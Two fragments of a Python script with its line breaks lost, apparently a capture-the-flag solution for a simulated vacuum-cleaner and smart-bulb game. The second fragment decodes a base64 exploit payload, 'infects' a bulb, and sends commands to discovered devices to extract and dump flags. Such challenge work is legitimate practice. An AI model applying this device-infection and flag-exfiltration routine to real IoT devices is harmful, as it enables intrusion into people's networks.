print("Trying to go forward - success : {}".format( cleaner.move(MoveDirection.FORWARD))) if cleaner.check_passability(): print("Trying to go forward - success : {}".format( cleaner.move(MoveDirection.FORWARD))) if cleaner.check_passability(): print("There is free space in front of device!") print("Trying to go forward - success : {}".format( cleaner.move(MoveDirection.FORWARD))) else: print("There is NO free space in front of device!") cleaner.print_env() print("Trying to clean surface - success : {}".format( cleaner.clean_surface())) cleaner.print_env() discovered_things = cleaner.discover_things() for thing in discovered_things: cleaner.send_message(thing, "Message from vacuum cleaner!") print("Discovered things: {}".format(discovered_things)) print("Trying to send debug message - success : {}".format( cleaner.send_debug_message("Message: test"))) # print("Trying to return to dock - success : {}".format(cleaner.return_dock())) cleaner.print_env() print("Trying to rotate right - success : {}".format( cleaner.rotate(RotateDirection.RIGHT)))
cleaner.send_debug_message( "Did not receive flag from : {}".format(device_name)) return "" if __name__ == '__main__': flags = "" cleaner = VacuumCleaner() exploit = base64.b64decode(EXPLOIT_4) # infect first bulb infect_device(cleaner) time.sleep(15) things = cleaner.discover_things() for device in things: cleaner.send_message(device, "FLAGFLAGFLAG" + cleaner.get_dev_id()[:10]) # wait for result flags += wait_flag(cleaner, "P1_") things = cleaner.discover_things() for device in things: cleaner.send_message(device, "STOPSTOPSTOP") dump_flag(cleaner, flags) flags = "" # go to second bulb for i in range(0, 7): cleaner.move(MoveDirection.FORWARD)